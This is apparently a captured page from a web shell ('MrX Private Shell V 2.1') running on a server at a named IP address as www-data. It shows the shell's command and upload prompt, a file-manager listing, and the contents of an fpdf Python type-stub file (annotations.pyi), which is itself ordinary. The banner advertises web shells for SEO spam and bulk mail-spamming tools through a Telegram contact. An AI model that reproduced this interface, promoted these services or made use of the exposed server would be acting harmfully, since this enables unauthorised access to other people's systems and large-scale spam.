__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.217.60: ~ $
from _typeshed import Incomplete
from datetime import datetime
from typing import NamedTuple

from .actions import Action
from .enums import AnnotationFlag, AnnotationName, FileAttachmentAnnotationName
from .syntax import Destination, Name, PDFContentStream, PDFObject

DEFAULT_ANNOT_FLAGS: tuple[AnnotationFlag, ...]

class AnnotationMixin:
    type: Name
    subtype: Name
    rect: str
    border: str
    f_t: Name | None
    v: Incomplete | None
    f: int  # AnnotationFlags bitmask
    contents: str | None
    a: Action | None
    dest: Destination | None
    c: str | None
    t: str | None
    m: str | None
    quad_points: str | None
    p: Incomplete | None
    name: AnnotationName | FileAttachmentAnnotationName | None
    ink_list: str | None
    f_s: str | None
    d_a: str | None
    def __init__(
        self,
        subtype: str,
        x: int,
        y: int,
        width: int,
        height: int,
        flags: tuple[AnnotationFlag | str, ...] = ...,
        contents: str | None = None,
        dest: Destination | None = None,
        action: Action | None = None,
        color: tuple[int, int, int] | None = None,
        modification_time: datetime | None = None,
        title: str | None = None,
        quad_points: tuple[float, ...] | None = None,  # multiple of 8 floats
        border_width: int = 0,
        name: AnnotationName | FileAttachmentAnnotationName | None = None,
        ink_list: tuple[int, ...] = (),
        file_spec: str | None = None,
        field_type: str | None = None,
        value: Incomplete | None = None,
        default_appearance: str | None = None,
    ) -> None: ...

class PDFAnnotation(AnnotationMixin, PDFObject): ...

class AnnotationDict(AnnotationMixin):
    def serialize(self) -> str: ...

class PDFEmbeddedFile(PDFContentStream):
    type: Name
    params: str
    def __init__(
        self,
        basename: str,
        contents: bytes,
        desc: str = "",
        creation_date: datetime | None = None,
        modification_date: datetime | None = None,
        compress: bool = False,
        checksum: bool = False,
    ) -> None: ...
    def globally_enclosed(self) -> bool: ...
    def set_globally_enclosed(self, value: bool) -> None: ...
    def basename(self) -> str: ...
    def file_spec(self) -> FileSpec: ...

class FileSpec(NamedTuple):
    embedded_file: PDFEmbeddedFile
    basename: str
    desc: str
    def serialize(self) -> str: ...

Filemanager

Name Type Size Permission Actions
__init__.pyi File 937 B 0644
_fonttools_shims.pyi File 1.94 KB 0644
actions.pyi File 1.15 KB 0644
annotations.pyi File 2.39 KB 0644
bidi.pyi File 2.38 KB 0644
deprecation.pyi File 342 B 0644
drawing.pyi File 15.02 KB 0644
encryption.pyi File 3.61 KB 0644
enums.pyi File 7.51 KB 0644
errors.pyi File 365 B 0644
fonts.pyi File 4.93 KB 0644
fpdf.pyi File 23.71 KB 0644
graphics_state.pyi File 3.64 KB 0644
html.pyi File 2.91 KB 0644
image_datastructures.pyi File 1.25 KB 0644
image_parsing.pyi File 2 KB 0644
line_break.pyi File 4.97 KB 0644
linearization.pyi File 1.53 KB 0644
outline.pyi File 1.74 KB 0644
output.pyi File 6.45 KB 0644
prefs.pyi File 2.19 KB 0644
py.typed File 0 B 0644
recorder.pyi File 383 B 0644
sign.pyi File 604 B 0644
structure_tree.pyi File 1.56 KB 0644
svg.pyi File 4.65 KB 0644
syntax.pyi File 2.25 KB 0644
table.pyi File 3.99 KB 0644
template.pyi File 1.45 KB 0644
text_region.pyi File 5.43 KB 0644
transitions.pyi File 1.93 KB 0644
unicode_script.pyi File 3.21 KB 0644
util.pyi File 1.35 KB 0644
Filemanager